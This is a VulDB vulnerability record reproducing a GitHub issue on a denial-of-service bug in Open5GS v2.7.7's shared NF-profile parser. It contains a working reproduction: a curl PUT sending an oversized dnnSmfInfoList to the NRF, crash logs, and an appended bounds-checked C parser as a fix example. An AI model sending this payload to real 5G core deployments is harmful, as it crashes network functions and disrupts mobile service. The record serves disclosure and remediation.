| Title | Open5GS NRF, AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
Open5GS uses a shared NF-profile parser in `lib/sbi/nnrf-handler.c` across
multiple network functions. When
`NFProfile.smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList` contains more DNN
entries than the internal fixed-size budget, the parser hits:
```c
int dnn_index = nf_info->smf.slice[nf_info->smf.num_of_slice].num_of_dnn;
ogs_assert(dnn_index < OGS_MAX_NUM_OF_DNN);
```
at `../lib/sbi/nnrf-handler.c:434` (around `431-434` depending on build).
This is a shared parser bug, not an NRF-only bug (NRF, AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR). A direct reproduction is
shown below against NRF because it is the shortest setup, but the same handler
is also reachable from other NF-profile parsing paths such as `nf-status-notify`
and discovery responses consumed by other Open5GS network functions.
### Root cause
- Crash site: `../lib/sbi/nnrf-handler.c:434`
- Bug class: attacker-controlled list length reaches a fixed DNN array
- Controlling field: `NFProfile.smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList`
### Steps to reproduce
```bash
NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf)
payload=$(cat <<'EOF'
{"nfInstanceId":"fake-smf-nrf","nfType":"SMF","nfStatus":"REGISTERED","smfInfo":{"sNssaiSmfInfoList":[{"sNssai":{"sst":1,"sd":"000001"},"dnnSmfInfoList":[{"dnn":"d0"},{"dnn":"d1"},{"dnn":"d2"},{"dnn":"d3"},{"dnn":"d4"},{"dnn":"d5"},{"dnn":"d6"},{"dnn":"d7"},{"dnn":"d8"},{"dnn":"d9"},{"dnn":"d10"},{"dnn":"d11"},{"dnn":"d12"},{"dnn":"d13"},{"dnn":"d14"},{"dnn":"d15"},{"dnn":"d16"}]}]}}
EOF
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-smf-nrf" \
-H 'content-type: application/json' \
--data "$payload"
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf
docker logs --tail 20 nrf
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T17:15:39.389225406Z
04/10 17:15:39.302: [sbi] FATAL: handle_smf_info: Assertion `dnn_index < OGS_MAX_NUM_OF_DNN' failed. (../lib/sbi/nnrf-handler.c:434)
```
### Expected behaviour
Open5GS should reject or cap oversized `dnnSmfInfoList` input before indexing the fixed DNN array, and it should never abort the whole process on peer-controlled NF-profile data.
### Observed Behaviour
The request terminates the HTTP/2 stream and crashes the process with exit code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Source | https://github.com/open5gs/open5gs/issues/4469 |
|---|
| User | ZiyuLin (UID 93568) |
|---|
| Submission | 04.05.2026 04:56 (1 month ago) |
|---|
| Moderation | 29.05.2026 19:15 (26 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 367293 [Open5GS up to 2.7.7 Shared NF-profile Parser lib/sbi/nnrf-handler.c Denial of Service] |
|---|
| Points | 20 |
|---|
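
The behaviour requested under "Expected behaviour", as an added example (not Open5GS code and not part of the report): the list length is checked against the fixed budget and the profile is rejected with an error code instead of asserting. `slice_info_t`, `parse_dnn_list`, the `PARSE_*` codes and the limits of 16 entries and 100 bytes are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_NUM_OF_DNN 16  /* assumed budget, stands in for OGS_MAX_NUM_OF_DNN */
#define MAX_DNN_LEN 100    /* assumed per-entry length limit */

enum { PARSE_OK = 0, PARSE_TOO_MANY_DNN = -1, PARSE_BAD_DNN = -2 };

typedef struct {           /* hypothetical stand-in for one slice's DNN table */
    int num_of_dnn;
    char dnn[MAX_NUM_OF_DNN][MAX_DNN_LEN + 1];
} slice_info_t;

/* Constructed sample: the 17 DNN names used in the report's payload. */
const char *const sample_dnns[17] = {
    "d0", "d1", "d2", "d3", "d4", "d5", "d6", "d7", "d8",
    "d9", "d10", "d11", "d12", "d13", "d14", "d15", "d16"
};

/* Copy a peer-supplied DNN list into the fixed array. Every entry is
 * validated before anything is written, so a rejected profile leaves
 * *out unchanged and the caller can answer with an error instead of
 * aborting the process. */
int parse_dnn_list(slice_info_t *out, const char *const *dnns, size_t count)
{
    size_t i;

    if (count > MAX_NUM_OF_DNN)
        return PARSE_TOO_MANY_DNN;
    for (i = 0; i < count; i++)
        if (!dnns[i] || !dnns[i][0] || strlen(dnns[i]) > MAX_DNN_LEN)
            return PARSE_BAD_DNN;

    for (i = 0; i < count; i++)
        strcpy(out->dnn[i], dnns[i]);  /* length checked above */
    out->num_of_dnn = (int)count;
    return PARSE_OK;
}

int main(void)
{
    slice_info_t slice = {0};
    int rc = parse_dnn_list(&slice, sample_dnns, 17);

    printf("17 entries -> rc %d, stored %d\n", rc, slice.num_of_dnn);
    rc = parse_dnn_list(&slice, sample_dnns, 16);
    printf("16 entries -> rc %d, stored %d\n", rc, slice.num_of_dnn);
    return 0;
}
```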